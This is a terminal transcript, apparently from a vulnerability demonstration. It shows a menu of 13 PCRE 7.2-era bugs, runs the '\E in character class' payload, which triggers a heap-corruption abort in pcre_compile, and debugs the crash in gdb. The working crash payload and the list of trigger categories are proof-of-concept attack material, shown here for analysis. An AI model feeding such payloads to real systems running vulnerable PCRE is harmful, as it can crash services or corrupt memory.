: user@vapor|0; pwd
/demos/pcre
: user@vapor|0; source ../demos.sh
: demo@vapor|0; handle_product
bash: config.sh: line 37: syntax error near unexpected token `('
bash: config.sh: line 37: `function ()'
00. lone \E with trigger char (6.x+)
01. matched \E deref (6.x+)
02. grouped string with \E (6.x+)
03. \E in character class (7.x+)
04. not a single char class (7.x+)
05. ditto, variation (7.x+)
06. optimised cond in group (6.x+)
07. variation (6.x+)
08. backtrack too far (6.x+)
09. another variant (6.x+)
10. seeking past end for \c (7.x+)
11. integer overflow (7.x)
12. integer overflow (7.x)
select vulnerability: 3
\E in character class (7.x+) selected.

payload: /[\\E]AAA/\ndata\n
press enter to run.

[1] 29778
PCRE version 7.2 2007-06-19

  re> *** glibc detected *** free(): invalid next size (fast): 0x08077ac8 ***
../demos.sh: line 80: 29780 Aborted (core dumped) /usr/local/encap/pcre-7.2/bin/pcretest <<(echo -e "$payload")
[1]+ Exit 134 ( eval $cmd )
Core file generated.
Opening gdb ...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
warning: Can't read pathname for load map: Input/output error.
Reading symbols from /usr/local/encap/pcre-7.2/lib/libpcreposix.so.0...done.
Loaded symbols for /usr/local/encap/pcre-7.2/lib/libpcreposix.so.0
Reading symbols from /usr/local/encap/pcre-7.2/lib/libpcre.so.0...done.
Loaded symbols for /usr/local/encap/pcre-7.2/lib/libpcre.so.0
Reading symbols from /lib/tls/i686/cmov/libc.so.6...Reading symbols from /usr/lib/debug/lib/tls/i686/cmov/libc-2.3.6.so...done.
done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.3.6.so...done.
done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `/usr/local/encap/pcre-7.2/bin/pcretest'.
Program terminated with signal 6, Aborted.
#0 0xffffe402 in __kernel_vsyscall ()
>> bt
#0 0xffffe402 in __kernel_vsyscall ()
#1 0x43b3d9a1 in raise () from /lib/tls/i686/cmov/libc.so.6
#2 0x43b3f2b9 in abort () from /lib/tls/i686/cmov/libc.so.6
#3 0x43b7187a in __libc_message () from /lib/tls/i686/cmov/libc.so.6
#4 0x43b77fd4 in _int_free () from /lib/tls/i686/cmov/libc.so.6
#5 0x43b7834a in free () from /lib/tls/i686/cmov/libc.so.6
#6 0x0804a8ed in new_free (block=0x8077ac8) at pcretest.c:556
#7 0xf7fdf824 in pcre_compile2 (pattern=0x8053009 "[\\E]AAA", options=0x0, errorcodeptr=0x0, errorptr=0xffffc970, erroroffset=0xffffc968, tables=0xf7ff6500 "")
    at pcre_compile.c:5701
#8 0xf7fdf123 in pcre_compile (pattern=0x8053009 "[\\E]AAA", options=0x0, errorptr=0xffffc970, erroroffset=0xffffc968, tables=0x0) at pcre_compile.c:5419
#9 0x0804c745 in main (argc=0x1, argv=0xffffd3c4) at pcretest.c:1242
>> up 7
#7 0xf7fdf824 in pcre_compile2 (pattern=0x8053009 "[\\E]AAA", options=0x0, errorcodeptr=0x0, errorptr=0xffffc970, erroroffset=0xffffc968, tables=0xf7ff6500 "") at pcre_compile.c:5701
5701 (pcre_free)(re);
>> p re
$1 = (real_pcre *) 0x8077ac8
>> l
5696
5697 /* Failed to compile, or error while post-processing */
5698
5699 if (errorcode != 0)
5700 {
5701 (pcre_free)(re);
5702 PCRE_EARLY_ERROR_RETURN:
5703 *erroroffset = ptr - (const uschar *)pattern;
5704 PCRE_EARLY_ERROR_RETURN2:
5705 *errorptr = error_texts[errorcode];
>> l 5696
5691
5692 /* Give an error if there's back reference to a non-existent capturing
5693 subpattern. */
5694
5695 if (errorcode == 0 && re->top_backref > re->top_bracket) errorcode = ERR15;
5696
5697 /* Failed to compile, or error while post-processing */
5698
5699 if (errorcode != 0)
5700 {
>> p *re
$2 = {magic_number = 0x50435245, size = 0x37, options = 0x0,
  dummy1 = 0x0, top_bracket = 0x0, top_backref = 0x0,
  first_byte = 0x0, req_byte = 0x0, name_table_offset = 0x28,
  name_entry_size = 0x0, name_count = 0x0,
  ref_count = 0x0, tables = 0x0, nullpad = 0x0}
>> info reg
eax 0x0 0x0
ecx 0x7454 0x7454
edx 0x6 0x6
ebx 0xf7ff7a80 0xf7ff7a80
esp 0xffffa670 0xffffa670
ebp 0xffffb768 0xffffb768
esi 0xffffd3c4 0xffffd3c4
edi 0x8053011 0x8053011
eip 0xf7fdf824 0xf7fdf824
eflags 0x10246 [ PF ZF IF RF ]
cs 0x23 0x23
ss 0x2b 0x2b
ds 0x2b 0x2b
es 0x2b 0x2b
fs 0x0 0x0
gs 0x63 0x63
>> quit
: demo@vapor|0; exit